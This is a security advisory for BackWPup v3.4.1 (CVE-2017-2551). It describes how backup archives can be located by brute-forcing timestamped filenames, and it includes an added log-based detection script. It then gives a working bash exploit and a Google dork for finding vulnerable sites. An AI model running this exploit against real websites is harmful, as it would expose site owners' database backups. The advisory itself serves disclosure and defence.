Advisory #: 201
Title: Vulnerability in WordPress Plugin backwpup v3.4.1: possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CVE-ID: CVE-2017-2551
CWE: CWE-552 Files or Directories Accessible to External Parties
Download Site: https://wordpress.org/plugins/backwpup
Vendor: Inpsyde
Vendor Notified: 2017-09-08
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=201
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
Vulnerability:
There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but it uses that same string to create the storage directory under wp-content/uploads/, which in most installations of WordPress allows file listings. Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file, as its structure is just a date and time stamp. It would take a maximum of 86400 tries to guess if a backup is available for that day.

Filename format: backwpup_RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s

Default settings are:
%d = Two digit day of the month, with leading zeros
%m = Month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second

https://wordpress.org/plugins/backwpup

I have an exploit available if you're interested.
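Added example (not part of the original advisory): the brute force described above leaves a distinctive trace in web server logs, one client requesting many distinct backwpup_..._%Y-%m-%d_%H-%i-%s names under the backup directory. The script below counts those names per client; the combined log format, the sample lines, the key "abc123" and the threshold of 10 are assumptions.

```shell
#!/bin/bash
# Added example, not part of the advisory: flag clients that request many
# distinct timestamped BackWPup archive names. Assumes combined log format.

# Constructed sample log (documentation IPs, made-up key "abc123").
sample_log() {
  local s
  # 192.0.2.10 walks consecutive seconds: 30 distinct names, all 404.
  for s in $(seq -w 0 29); do
    printf '192.0.2.10 - - [07/Sep/2017:10:00:%s +0000] "HEAD /wp-content/uploads/backwpup-abc123-backups/backwpup_abc12301_2017-09-07_00-00-%s.zip HTTP/1.1" 404 0 "-" "curl/7.55"\n' "$s" "$s"
  done
  # 198.51.100.7 downloads a single archive once.
  printf '198.51.100.7 - - [07/Sep/2017:11:00:00 +0000] "GET /wp-content/uploads/backwpup-abc123-backups/backwpup_abc12301_2017-09-07_03-00-01.zip HTTP/1.1" 200 1048576 "-" "Mozilla/5.0"\n'
  # 203.0.113.5 requests the uploads listing only; not an archive name.
  printf '203.0.113.5 - - [07/Sep/2017:11:05:00 +0000] "GET /wp-content/uploads/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"\n'
}

# Usage: detect_backwpup_scan THRESHOLD < access.log
# Prints "ip distinct_names responses_200" for every client that asked for at
# least THRESHOLD distinct backwpup_*_Y-m-d_H-i-s archive names.
detect_backwpup_scan() {
  awk -v min="$1" '
    BEGIN {
      d = "[0-9][0-9]"
      re = "/backwpup-[^/]+-backups/backwpup_[^/]*_" d d "-" d "-" d "_" d "-" d "-" d "[.]"
    }
    $7 ~ re {
      if (!(($1, $7) in seen)) { seen[$1, $7] = 1; names[$1]++ }
      if ($9 == 200) hits[$1]++     # a 200 means an archive was located
    }
    END {
      for (ip in names)
        if (names[ip] >= min) printf "%s %d %d\n", ip, names[ip], hits[ip] + 0
    }' | sort
}

# Demo on the constructed sample; 10 is an arbitrary threshold.
sample_log | detect_backwpup_scan 10
```

A non-zero third column means at least one probed name returned 200, so that archive should be treated as disclosed.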
Exploit Code:
#!/bin/bash
#Exploit for Wordpress Plugin BackWPup v3.4.1
#Download https://wordpress.org/plugins/backwpup
#CWE-552: Files or Directories Accessible to External Parties
#CVE-ID: CVE-2017-2551
#Google Dork: inurl:wp-content/uploads/backwpup

#Add banner about vulnerability

#Read the random key from the uploads/ directory listing
KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`

#Add error checking here
echo "[+] Getting Unique Key $KEY"
DIR="backwpup-$KEY-backups"
echo "[+] Checking directory $DIR"
WPATH="$DIR/backwpup_$KEY"
echo "[+] Creating Path: $WPATH"
#use date command here for the default date of current day
MONTH=09
DAY=07
YEAR=2017
Z=0

echo "[+] Scanning website for available backups:"
#y = hour, x = minute, z = second
for y in `seq -w 0 23`; do
  for x in `seq -w 0 59`; do
    #Progress as a percentage of the 86400 seconds in a day
    Y=`echo "scale=2;($Z/86400)*100"|bc`;
    echo -ne "\r$CWPATH $Y%"
    for z in `seq -w 0 59`; do
      Z=$(( $Z + 1 ));
      CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
      RESULT=`curl -s --head "$CWPATH"|grep 200`;
      if [ -n "$RESULT" ]; then
        echo ""
        echo "[+] Location $CWPATH Found";
        echo "[+] Received $RESULT";
        echo "Downloading......";
        # wget $CWPATH
      fi;
    done
  done
done
echo "Completed."
Notes:
Google Dork: inurl:wp-content/uploads/backwpup